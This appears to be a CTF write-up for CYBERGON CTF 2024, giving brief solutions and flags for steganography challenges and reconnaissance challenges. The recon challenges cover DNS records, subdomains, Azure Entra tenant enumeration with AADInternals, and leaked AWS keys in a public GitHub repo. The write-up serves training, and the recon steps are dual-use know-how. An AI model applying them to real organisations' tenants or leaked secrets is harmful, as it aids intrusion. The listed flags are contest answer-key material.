Find the secret behind the wall ? CYBERGON_CTF2024{xxxx_xxxxx_xxxxx}

Author - iamkfromburma

This challenge, in JS.txt I found extra tabs and spaces charecters.

Also found in interested data seem like password at challenge4.jpg

I use stegsnow tool for decoding messages in text files cause it is appending tabs and
whitespaces at the end messages. Then I got the flag.

CYBERGON_CTF2024{3X1f_w1th_5n0w5}

(3) Truesight
If you are waiting for a sign, this is it. CYBERGON_CTF2024{xxx_xxxx_xxxxx}

Author - iamkfromburma
 I observed that this challenge image is wrong file signature.

I used hexeditor tool and change the hex value of PNG file signature - 89 50 4E 47 0D
0A 1A 0A

Then I got the flag.

CYBERGON_CTF2024{y0u_g07_7h3_r!gh7_s1gn5}
Reconnaissance
Validation
Can you determine the number of TXT and SPF records in flaghhunt.lol?

Flag Format - CYBERGON_CTF2024{total TXT:total SPF}

Author : Too

We found 4 TXT record and 1 SPF record of flaghunt.lol

CYBERGON_CTF2024{4:1}
(2) Secure Life
What is the certificate's expiration date?

Flag Format - CYBERGON_CTF2024{YYYY:MM:DD:HH:MM:SS}

Author : Too

The certificate's expiration date is Nov 24 20:38:00 2039 GMT.

CYBERGON_CTF2024{2039:11:24:20:38:00}

(3) Discovery
How many subdomains exist under flaghunt.lol?

Flag Format - CYBERGON_CTF2024{number of subdomains}

Author - Too

flaghunt.lol

We found 19 subdomains exist under flaghunt.lol.

CYBERGON_CTF2024{19}

(4) Uncover
Intel Byte Company has Azure Entra Service Your task is to uncover its name
!!

Flag Format - CYBERGON_CTF2024{tenant's name}

Author - Too

We have enumerated the Azure Entra Service's Tenant Name of intelbyte.io with
AADInternals tool.
CYBERGON_CTF2024{goddamnit2024.onmicrosoft.com}

(5) Leakage
An SRE working on Kubernetes deployments over AWS cloud and ,accidentally
pushed sensitive code and configurations to a public GitHub repository. Upon
analysis, it seems like some configurations might be related with a server
api.flaghunt.lol.

Your task is to investigate the exposed repository and find sensitive

information like AWS credentials or other secrets.

Flag Format - CYBERGON_CTF2024{secrets}

Author - Too
github.com

We found 1 code result related about with api.flaghunt.lol on GitHub.

Then we observed the dummybear00's repo.

Then we got the AWS api key in kubernetes-config fie.

CYBERGON_CTF2024{34af-atg4-34gs-f234g-79g6}
Bonus
Where Are You Know

Take screenshot for your team profile including the ranking.

Post on social media (facebook, linkedin, twitter) with the hashtag #cybergonctf2024
Show post's screenshot and get the flag from me.
Author - iamkfromburma

Feedback

It's time to listen your feedback. Hopefully, everyone will enjoy our CYBERGON CTF_2024 !!!!
CYBERGON_CTF2024{xxx_xxx_xxx}
Author – iamkfromburma

We got flag after submit the feedback.